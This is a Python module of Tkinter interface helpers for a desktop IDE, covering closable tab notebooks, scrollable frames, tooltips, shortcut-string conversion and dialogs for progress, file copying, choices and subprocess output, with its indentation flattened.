# respect if required images have been defined already
if "img_close" not in self.image_names():
img_dir = os.path.join(os.path.dirname(__file__), "res")
ClosableNotebook._close_img = tk.PhotoImage(
"img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
)
ClosableNotebook._close_active_img = tk.PhotoImage(
"img_tab_close_active",
file=os.path.join(img_dir, "tab_close_active.gif"),
)
style.element_create(
"closebutton",
"image",
"img_tab_close",
("active", "pressed", "!disabled", "img_tab_close_active"),
("active", "!disabled", "img_tab_close_active"),
border=8,
sticky="",
)
style.layout(
"ButtonNotebook.TNotebook.Tab",
[
(
"Notebook.tab",
{
"sticky": "nswe",
"children": [
(
"Notebook.padding",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.focus",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.label",
{"side": "left", "sticky": ""},
),
(
"Notebook.closebutton",
{"side": "left", "sticky": ""},
),
],
},
)
],
},
)
],
},
)
],
)
def _check_remove_padding(self, kw):
# Windows themes produce 1-pixel padding to the bottom of the pane
# Don't know how to get rid of it using themes
if "padding" not in kw and ttk.Style().theme_use().lower() in (
"windows",
"xpnative",
"vista",
):
kw["padding"] = (0, 0, 0, -1)
def add(self, child, **kw):
self._check_remove_padding(kw)
super().add(child, **kw)
def insert(self, pos, child, **kw):
self._check_remove_padding(kw)
super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
"""
Enables inserting views according to their position keys.
    Remembers its own position key. Automatically updates its visibility.
"""
def __init__(self, master, position_key, preferred_size_in_pw=None):
if get_workbench().get_ui_mode() == "simple":
style = "TNotebook"
else:
style = "ButtonNotebook.TNotebook"
super().__init__(master, style=style, padding=0)
self.position_key = position_key
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def add(self, child, **kw):
super().add(child, **kw)
self._update_visibility()
def insert(self, pos, child, **kw):
if pos == "auto":
for sibling in map(self.nametowidget, self.tabs()):
if (
not hasattr(sibling, "position_key")
                    or sibling.position_key is None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
super().insert(pos, child, **kw)
self._update_visibility()
def hide(self, tab_id):
super().hide(tab_id)
self._update_visibility()
def forget(self, tab_id):
if tab_id in self.tabs() or tab_id in self.winfo_children():
super().forget(tab_id)
self._update_visibility()
def is_visible(self):
return self in self.master.pane_widgets()
def get_visible_child(self):
for child in self.winfo_children():
if str(child) == str(self.select()):
return child
return None
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.tabs()) == 0 and self.is_visible():
self.master.remove(self)
if len(self.tabs()) > 0 and not self.is_visible():
self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
def __init__(
self,
master,
columns,
displaycolumns="#all",
show_scrollbar=True,
borderwidth=0,
relief="flat",
**tree_kw
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
)
if show_scrollbar:
self.vert_scrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.tree = ttk.Treeview(
self,
columns=columns,
displaycolumns=displaycolumns,
yscrollcommand=self.vert_scrollbar.set,
**tree_kw
)
self.tree["show"] = "headings"
self.tree.grid(row=0, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def on_select(self, event):
pass
def on_double_click(self, event):
pass
def scrollbar_style(orientation):
# In mac ttk.Scrollbar uses native rendering unless style attribute is set
# see http://wiki.tcl.tk/44444#pagetoc50f90d9a
# Native rendering doesn't look good in dark themes
if running_on_mac_os() and get_workbench().uses_dark_ui_theme():
return orientation + ".TScrollbar"
else:
return None
def sequence_to_accelerator(sequence):
"""Translates Tk event sequence to customary shortcut string
for showing in the menu"""
if not sequence:
return ""
if not sequence.startswith("<"):
return sequence
accelerator = (
sequence.strip("<>")
.replace("Key-", "")
.replace("KeyPress-", "")
.replace("Control", "Ctrl")
)
# Tweaking individual parts
parts = accelerator.split("-")
# tkinter shows shift with capital letter, but in shortcuts it's customary to include it explicitly
    if len(parts[-1]) == 1 and parts[-1].isupper() and "Shift" not in parts:
parts.insert(-1, "Shift")
# even when shift is not required, it's customary to show shortcut with capital letter
if len(parts[-1]) == 1:
parts[-1] = parts[-1].upper()
accelerator = "+".join(parts)
# Post processing
accelerator = (
accelerator.replace("Minus", "-")
.replace("minus", "-")
.replace("Plus", "+")
.replace("plus", "+")
)
return accelerator
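# Examples (illustrative):
#     sequence_to_accelerator("<Control-Key-s>")        -> "Ctrl+S"
#     sequence_to_accelerator("<Control-Shift-Key-S>")  -> "Ctrl+Shift+S"
#     sequence_to_accelerator("<Control-Key-S>")        -> "Ctrl+Shift+S"  (Shift made explicit)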
def get_zoomed(toplevel):
if "-zoomed" in toplevel.wm_attributes(): # Linux
return bool(toplevel.wm_attributes("-zoomed"))
else: # Win/Mac
return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
if "-zoomed" in toplevel.wm_attributes(): # Linux
toplevel.wm_attributes("-zoomed", str(int(value)))
else: # Win/Mac
if value:
toplevel.wm_state("zoomed")
else:
toplevel.wm_state("normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
def direct_insert(self, index, chars, tags=None, **kw):
try:
# try removing line numbers
# TODO: shouldn't it take place only on paste?
# TODO: does it occur when opening a file with line numbers in it?
# if self._propose_remove_line_numbers and isinstance(chars, str):
# chars = try_remove_linenumbers(chars, self)
concrete_index = self.index(index)
return tktextext.EnhancedText.direct_insert(
self, index, chars, tags=tags, **kw
)
finally:
get_workbench().event_generate(
"TextInsert",
index=concrete_index,
text=chars,
tags=tags,
text_widget=self,
)
def direct_delete(self, index1, index2=None, **kw):
try:
# index1 may be eg "sel.first" and it doesn't make sense *after* deletion
concrete_index1 = self.index(index1)
if index2 is not None:
concrete_index2 = self.index(index2)
else:
concrete_index2 = None
return tktextext.EnhancedText.direct_delete(
self, index1, index2=index2, **kw
)
finally:
get_workbench().event_generate(
"TextDelete",
index1=concrete_index1,
index2=concrete_index2,
text_widget=self,
)
class SafeScrollbar(ttk.Scrollbar):
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
try:
ttk.Scrollbar.set(self, first, last)
except Exception:
traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
# http://effbot.org/zone/tkinter-autoscrollbar.htm
# a vert_scrollbar that hides itself if it's not needed. only
# works if you use the grid geometry manager.
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
if float(first) <= 0.0 and float(last) >= 1.0:
self.grid_remove()
        elif float(first) > 0.001 or float(last) < 0.999:
# with >0 and <1 it occasionally made scrollbar wobble back and forth
self.grid()
ttk.Scrollbar.set(self, first, last)
def pack(self, **kw):
raise tk.TclError("cannot use pack with this widget")
def place(self, **kw):
raise tk.TclError("cannot use place with this widget")
def update_entry_text(entry, text):
original_state = entry.cget("state")
entry.config(state="normal")
entry.delete(0, "end")
entry.insert(0, text)
entry.config(state=original_state)
class VerticallyScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
self.canvas = tk.Canvas(
self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set
)
vscrollbar.config(command=self.canvas.yview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior_id = self.canvas.create_window(
0, 0, window=self.interior, anchor=tk.NW
)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self.update_scrollbars()
def _configure_interior(self, event):
self.update_scrollbars()
def update_scrollbars(self):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
if (
self.interior.winfo_reqwidth() != self.canvas.winfo_width()
and self.canvas.winfo_width() > 10
):
# update the interior's width to fit canvas
# print("CAWI", self.canvas.winfo_width())
self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
self.canvas = tk.Canvas(
self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set
)
vscrollbar.config(command=self.canvas.yview)
hscrollbar.config(command=self.canvas.xview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior.columnconfigure(0, weight=1)
self.interior.rowconfigure(0, weight=1)
self.interior_id = self.canvas.create_window(
0, 0, window=self.interior, anchor=tk.NW
)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self._configure_interior(event)
def _configure_interior(self, event):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self._ui_theme_change_binding = self.bind(
"<<ThemeChanged>>", self._reload_theme_options, True
)
self._reload_theme_options()
def _reload_theme_options(self, event=None):
style = ttk.Style()
states = []
if self["state"] == "disabled":
states.append("disabled")
# Following crashes when a combobox is focused
# if self.focus_get() == self:
# states.append("focus")
opts = {}
for key in [
"background",
"foreground",
"highlightthickness",
"highlightcolor",
"highlightbackground",
]:
value = style.lookup(self.get_style_name(), key, states)
if value:
opts[key] = value
self.configure(opts)
def get_style_name(self):
return "Listbox"
def destroy(self):
self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
super().destroy()
class ToolTip:
"""Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""
def __init__(self, widget, options):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
self.options = options
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, _, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 27
y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
self.tipwindow = tw = tk.Toplevel(self.widget)
tw.wm_overrideredirect(1)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
tw.wm_transient(self.widget)
tw.wm_geometry("+%d+%d" % (x, y))
try:
# For Mac OS
tw.tk.call(
"::tk::unsupported::MacWindowStyle",
"style",
tw._w,
"help",
"noActivates",
)
except tk.TclError:
pass
label = tk.Label(tw, text=self.text, **self.options)
label.pack()
# get_workbench().bind("WindowFocusOut", self.hidetip, True)
def hidetip(self, event=None):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
# get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
options = get_style_configuration("Tooltip").copy()
options.setdefault("background", "#ffffe0")
options.setdefault("relief", "solid")
options.setdefault("borderwidth", 1)
options.setdefault("padx", 1)
options.setdefault("pady", 0)
options.update(kw)
toolTip = ToolTip(widget, options)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind("<Enter>", enter)
widget.bind("<Leave>", leave)
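# Illustrative sketch (not part of the original module): the tooltip positioning
# relies on the widget supporting bbox("insert"), so Entry/Text-like widgets are
# the safest targets; the entry and tooltip text below are hypothetical.
def _demo_create_tooltip():
    root = tk.Tk()
    entry = ttk.Entry(root)
    entry.grid(padx=20, pady=20)
    create_tooltip(entry, "Type a file name here")
    root.mainloop()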
class NoteBox(tk.Toplevel):
def __init__(self, master=None, max_default_width=300, **kw):
super().__init__(master=master, highlightthickness=0, **kw)
self._max_default_width = max_default_width
self.wm_overrideredirect(True)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
self.wm_transient(master)
try:
# For Mac OS
self.tk.call(
"::tk::unsupported::MacWindowStyle",
"style",
self._w,
"help",
"noActivates",
)
except tk.TclError:
pass
self._current_chars = ""
self._click_bindings = {}
self.padx = 5
self.pady = 5
self.text = TweakableText(
self,
background="#ffffe0",
borderwidth=1,
relief="solid",
undo=False,
read_only=True,
font="TkDefaultFont",
highlightthickness=0,
padx=self.padx,
pady=self.pady,
wrap="word",
)
self.text.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.text.bind("<Escape>", self.close, True)
# tk._default_root.bind_all("<1>", self._close_maybe, True)
# tk._default_root.bind_all("<Key>", self.close, True)
self.withdraw()
def clear(self):
for tag in self._click_bindings:
self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
self.text.tag_remove(tag, "1.0", "end")
self.text.direct_delete("1.0", "end")
self._current_chars = ""
self._click_bindings.clear()
def set_content(self, *items):
self.clear()
for item in items:
if isinstance(item, str):
self.text.direct_insert("1.0", item)
self._current_chars = item
else:
assert isinstance(item, (list, tuple))
chars, *props = item
if len(props) > 0 and callable(props[-1]):
tags = tuple(props[:-1])
click_handler = props[-1]
else:
tags = tuple(props)
click_handler = None
self.append_text(chars, tags, click_handler)
self.text.see("1.0")
def append_text(self, chars, tags=(), click_handler=None):
tags = tuple(tags)
if click_handler is not None:
click_tag = "click_%d" % len(self._click_bindings)
tags = tags + (click_tag,)
binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
self._click_bindings[click_tag] = binding
self.text.direct_insert("end", chars, tags)
self._current_chars += chars
def place(self, target, focus=None):
# Compute the area that will be described by this Note
focus_x = target.winfo_rootx()
focus_y = target.winfo_rooty()
focus_height = target.winfo_height()
if isinstance(focus, TextRange):
assert isinstance(target, tk.Text)
topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
if focus.end_col_offset == 0:
botright = target.bbox(
"%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
)
else:
botright = target.bbox(
"%d.%d" % (focus.end_lineno, focus.end_col_offset)
)
if topleft and botright:
focus_x += topleft[0]
focus_y += topleft[1]
focus_height = botright[1] - topleft[1] + botright[3]
elif isinstance(focus, (list, tuple)):
focus_x += focus[0]
focus_y += focus[1]
focus_height = focus[3]
elif focus is None:
pass
else:
raise TypeError("Unsupported focus")
# Compute dimensions of the note
font = self.text["font"]
if isinstance(font, str):
font = tk.font.nametofont(font)
lines = self._current_chars.splitlines()
max_line_width = 0
for line in lines:
max_line_width = max(max_line_width, font.measure(line))
width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
self.update_idletasks()
line_count = int(float(self.text.index("end")))
line_height = font.metrics()["linespace"]
self.wm_geometry(
"%dx%d+%d+%d"
% (width, line_count * line_height, focus_x, focus_y + focus_height)
)
# TODO: detect the situation when note doesn't fit under
# the focus box and should be placed above
self.deiconify()
def show_note(
self, *content_items: Union[str, List], target=None, focus=None
) -> None:
self.set_content(*content_items)
self.place(target, focus)
def _close_maybe(self, event):
if event.widget not in [self, self.text]:
self.close(event)
def close(self, event=None):
self.withdraw()
def get_widget_offset_from_toplevel(widget):
x = 0
y = 0
toplevel = widget.winfo_toplevel()
while widget != toplevel:
x += widget.winfo_x()
y += widget.winfo_y()
widget = widget.master
return x, y
def create_string_var(value, modification_listener=None):
"""Creates a tk.StringVar with "modified" attribute
showing whether the variable has been modified after creation"""
return _create_var(tk.StringVar, value, modification_listener)
def create_int_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.IntVar, value, modification_listener)
def create_double_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.DoubleVar, value, modification_listener)
def create_boolean_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.BooleanVar, value, modification_listener)
def _create_var(class_, value, modification_listener):
var = class_(value=value)
var.modified = False
def on_write(*args):
var.modified = True
if modification_listener:
try:
modification_listener()
except Exception:
# Otherwise whole process will be brought down
# because for some reason Tk tries to call non-existing method
# on variable
get_workbench().report_exception()
# TODO: https://bugs.python.org/issue22115 (deprecation warning)
var.trace("w", on_write)
return var
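# Minimal illustration (not part of the original module) of the "modified"
# attribute and the optional modification listener; the variable and callback
# names are arbitrary.
def _demo_create_string_var():
    root = tk.Tk()
    def on_change():
        print("value changed to", var.get())
    var = create_string_var("initial", modification_listener=on_change)
    assert var.modified is False
    var.set("updated")  # fires on_change and flips var.modified to True
    assert var.modified is True
    root.destroy()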
def shift_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0001
def control_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0004
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
# remember handlers for certain shortcuts which require
# different treatment on non-latin keyboards
if sequence[0] != "<":
return None
parts = sequence.strip("<").strip(">").split("-")
# support only latin letters for now
if parts[-1].lower() not in list("abcdefghijklmnopqrstuvwxyz"):
return None
letter = parts.pop(-1)
if "Key" in parts:
parts.remove("Key")
if "key" in parts:
parts.remove("key")
modifiers = {part.lower() for part in parts}
if letter.isupper():
modifiers.add("shift")
if modifiers not in [{"control"}, {"control", "shift"}]:
# don't support others for now
return None
event_state = 0
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
for modifier in modifiers:
if modifier == "shift":
event_state |= 0x0001
elif modifier == "control":
event_state |= 0x0004
else:
# unsupported modifier
return None
# for latin letters keycode is same as its ascii code
return (event_state, ord(letter.upper()))
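# Illustrative expected values (not part of the original module): Control maps
# to state bit 0x0004, Shift adds 0x0001, and the keycode is the ASCII code of
# the upper-case letter; sequences with unsupported modifiers yield None.
def _demo_sequence_to_event_state_and_keycode():
    assert sequence_to_event_state_and_keycode("<Control-c>") == (0x0004, ord("C"))
    assert sequence_to_event_state_and_keycode("<Control-Shift-Z>") == (0x0005, ord("Z"))
    assert sequence_to_event_state_and_keycode("<Alt-c>") is None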
def select_sequence(win_version, mac_version, linux_version=None):
if running_on_windows():
return win_version
elif running_on_mac_os():
return mac_version
elif running_on_linux() and linux_version:
return linux_version
else:
return win_version
def try_remove_linenumbers(text, master):
try:
if has_line_numbers(text) and messagebox.askyesno(
title="Remove linenumbers",
message="Do you want to remove linenumbers from pasted text?",
default=messagebox.YES,
master=master,
parent=master,
):
return remove_line_numbers(text)
else:
return text
except Exception:
traceback.print_exc()
return text
def has_line_numbers(text):
lines = text.splitlines()
return len(lines) > 2 and all(
[len(split_after_line_number(line)) == 2 for line in lines]
)
def split_after_line_number(s):
parts = re.split(r"(^\s*\d+\.?)", s)
if len(parts) == 1:
return parts
else:
assert len(parts) == 3 and parts[0] == ""
return parts[1:]
def remove_line_numbers(s):
cleaned_lines = []
for line in s.splitlines():
parts = split_after_line_number(line)
if len(parts) != 2:
return s
else:
cleaned_lines.append(parts[1])
return textwrap.dedent(("\n".join(cleaned_lines)) + "\n")
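# Illustration (not part of the original module) of the line-number helpers on
# a hypothetical piece of pasted text:
def _demo_remove_line_numbers():
    pasted = "1. import os\n2. print(os.getcwd())\n3. print('done')"
    assert has_line_numbers(pasted)
    assert remove_line_numbers(pasted) == "import os\nprint(os.getcwd())\nprint('done')\n"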
def assign_geometry(win, master=None):
if master is None:
master = tk._default_root
size = get_workbench().get_option(get_size_option_name(win))
if size:
width, height = size
saved_size = True
else:
fallback_width = 600
fallback_height = 400
# need to wait until size is computed
# (unfortunately this causes dialog to jump)
if getattr(master, "initializing", False):
# can't get reliable positions when main window is not in mainloop yet
width = fallback_width
height = fallback_height
else:
if not running_on_linux():
# better to avoid in Linux because it causes ugly jump
win.update_idletasks()
# looks like it doesn't take window border into account
width = win.winfo_width()
height = win.winfo_height()
if width < 10:
# ie. size measurement is not correct
width = fallback_width
height = fallback_height
saved_size = False
left = master.winfo_rootx() + master.winfo_width() // 2 - width // 2
top = master.winfo_rooty() + master.winfo_height() // 2 - height // 2
if saved_size:
win.geometry("%dx%d+%d+%d" % (width, height, left, top))
else:
win.geometry("+%d+%d" % (left, top))
class WaitingDialog(tk.Toplevel):
def __init__(
self, master, async_result, description, title="Please wait!", timeout=None
):
self._async_result = async_result
super().__init__(master)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
self.title(title)
self.resizable(height=tk.FALSE, width=tk.FALSE)
# self.protocol("WM_DELETE_WINDOW", self._close)
self.desc_label = ttk.Label(self, text=description, wraplength=300)
self.desc_label.grid(padx=20, pady=20)
self.update_idletasks()
self.timeout = timeout
self.start_time = time.time()
self.after(500, self._poll)
def _poll(self):
if self._async_result.ready():
self._close()
elif self.timeout and time.time() - self.start_time > self.timeout:
raise TimeoutError()
else:
self.after(500, self._poll)
self.desc_label["text"] = self.desc_label["text"] + "."
def _close(self):
self.destroy()
def run_with_waiting_dialog(master, action, args=(), description="Working"):
# http://stackoverflow.com/a/14299004/261181
from multiprocessing.pool import ThreadPool
pool = ThreadPool(processes=1)
async_result = pool.apply_async(action, args)
dlg = WaitingDialog(master, async_result, description=description)
show_dialog(dlg, master)
return async_result.get()
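# Usage sketch (not part of the original module): `action` runs in a worker
# thread while the dialog keeps polling; `slow_action` and its argument are
# hypothetical.
def _demo_run_with_waiting_dialog(master):
    def slow_action(seconds):
        time.sleep(seconds)
        return "finished"
    result = run_with_waiting_dialog(
        master, slow_action, args=(3,), description="Crunching numbers"
    )
    print(result)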
class FileCopyDialog(tk.Toplevel):
def __init__(self, master, source, destination, description=None, fsync=True):
self._source = source
self._destination = destination
self._old_bytes_copied = 0
self._bytes_copied = 0
self._fsync = fsync
self._done = False
self._cancelled = False
self._closed = False
super().__init__(master)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(row=0, column=0, sticky="nsew")
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.title("Copying")
if description is None:
description = "Copying\n %s\nto\n %s" % (source, destination)
label = ttk.Label(main_frame, text=description)
label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)
self._bar = ttk.Progressbar(
main_frame, maximum=os.path.getsize(source), length=200
)
self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)
self._cancel_button = ttk.Button(
main_frame, text="Cancel", command=self._cancel
)
self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
self._bar.focus_set()
main_frame.columnconfigure(0, weight=1)
self._update_progress()
self.bind(
"<Escape>", self._cancel, True
) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._cancel)
self._start()
def _start(self):
def work():
            self._copy_progress = 0
with open(self._source, "rb") as fsrc:
with open(self._destination, "wb") as fdst:
while True:
buf = fsrc.read(16 * 1024)
if not buf:
break
fdst.write(buf)
fdst.flush()
if self._fsync:
os.fsync(fdst)
self._bytes_copied += len(buf)
self._done = True
threading.Thread(target=work, daemon=True).start()
def _update_progress(self):
if self._done:
if not self._closed:
self._close()
return
self._bar.step(self._bytes_copied - self._old_bytes_copied)
self._old_bytes_copied = self._bytes_copied
self.after(100, self._update_progress)
def _close(self):
self.destroy()
self._closed = True
def _cancel(self, event=None):
self._cancelled = True
self._close()
class ChoiceDialog(tk.Toplevel):
def __init__(
self, master=None, title="Choose one", question: str = "Choose one:", choices=[]
) -> None:
super().__init__(master=master)
self.title(title)
self.resizable(False, False)
self.columnconfigure(0, weight=1)
row = 0
question_label = ttk.Label(self, text=question)
question_label.grid(
row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20
)
row += 1
self.var = tk.StringVar()
for choice in choices:
rb = ttk.Radiobutton(self, text=choice, variable=self.var, value=choice)
rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
row += 1
ok_button = ttk.Button(self, text="OK", command=self._ok, default="active")
ok_button.grid(row=row, column=0, sticky="e", pady=20)
cancel_button = ttk.Button(self, text="Cancel", command=self._cancel)
cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)
self.bind("<Escape>", self._cancel, True)
self.bind("<Return>", self._ok, True)
self.protocol("WM_DELETE_WINDOW", self._cancel)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
def _ok(self):
self.result = self.var.get()
if not self.result:
self.result = None
self.destroy()
def _cancel(self):
self.result = None
self.destroy()
class LongTextDialog(tk.Toplevel):
def __init__(self, title, text_content, parent=None):
if parent is None:
parent = tk._default_root
super().__init__(master=parent)
self.title(title)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
default_font = tk.font.nametofont("TkDefaultFont")
self._text = tktextext.TextFrame(
main_frame,
read_only=True,
wrap="none",
font=default_font,
width=80,
height=10,
relief="sunken",
borderwidth=1,
)
self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
self._text.text.direct_insert("1.0", text_content)
self._text.text.see("1.0")
copy_button = ttk.Button(
main_frame, command=self._copy, text="Copy to clipboard", width=20
)
copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))
close_button = ttk.Button(main_frame, command=self._close, text="Close")
close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close, True)
def _copy(self, event=None):
self.clipboard_clear()
self.clipboard_append(self._text.text.get("1.0", "end"))
def _close(self, event=None):
self.destroy()
def ask_one_from_choices(
master=None, title="Choose one", question: str = "Choose one:", choices=[]
):
dlg = ChoiceDialog(master, title, question, choices)
show_dialog(dlg, master)
return dlg.result
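# Usage sketch (not part of the original module): returns the selected string,
# or None if the dialog is cancelled; the title, question and choices below are
# hypothetical.
def _demo_ask_one_from_choices(master):
    answer = ask_one_from_choices(
        master,
        title="Interpreter",
        question="Which interpreter should be used?",
        choices=["Local Python 3", "Remote Python 3"],
    )
    print("cancelled" if answer is None else "chose " + answer)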
class SubprocessDialog(tk.Toplevel):
    """Incrementally shows the output of the given subprocess.
    Allows cancelling."""
def __init__(
self,
master,
proc,
title,
long_description=None,
autoclose=True,
conclusion="Done.",
):
self._closed = False
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self.returncode = None
self.cancelled = False
self._autoclose = autoclose
self._event_queue = collections.deque()
self._conclusion = conclusion
tk.Toplevel.__init__(self, master)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(sticky="nsew")
text_font = tk.font.nametofont("TkFixedFont").copy()
text_font["size"] = int(text_font["size"] * 0.9)
text_font["family"] = "Courier" if running_on_mac_os() else "Courier New"
text_frame = tktextext.TextFrame(
main_frame,
read_only=True,
horizontal_scrollbar=False,
background=lookup_style_option("TFrame", "background"),
font=text_font,
wrap="word",
)
text_frame.grid(row=0, column=0, sticky=tk.NSEW, padx=15, pady=15)
self.text = text_frame.text
self.text["width"] = 60
self.text["height"] = 7
if long_description is not None:
self.text.direct_insert("1.0", long_description + "\n\n")
self.button = ttk.Button(main_frame, text="Cancel", command=self._close)
self.button.grid(row=1, column=0, pady=(0, 15))
main_frame.rowconfigure(0, weight=1)
main_frame.columnconfigure(0, weight=1)
self.title(title)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
# self.resizable(height=tk.FALSE, width=tk.FALSE)
self.text.focus_set()
self.bind(
"<Escape>", self._close_if_done, True
) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._close)
self._start_listening()
def _start_listening(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self._event_queue.append((stream_name, data))
setattr(self, stream_name, getattr(self, stream_name) + data)
if data == "":
break
self.returncode = self._proc.wait()
self._stdout_thread = threading.Thread(
target=listen_stream, args=["stdout"], daemon=True
)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def poll_output_events():
if self._closed:
return
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.see("end")
self.returncode = self._proc.poll()
            if self.returncode is None:
self.after(200, poll_output_events)
else:
self.button["text"] = "OK"
self.button.focus_set()
if self.returncode != 0:
                    self.text.direct_insert(
                        "end",
                        "\n\nReturn code: " + str(self.returncode),
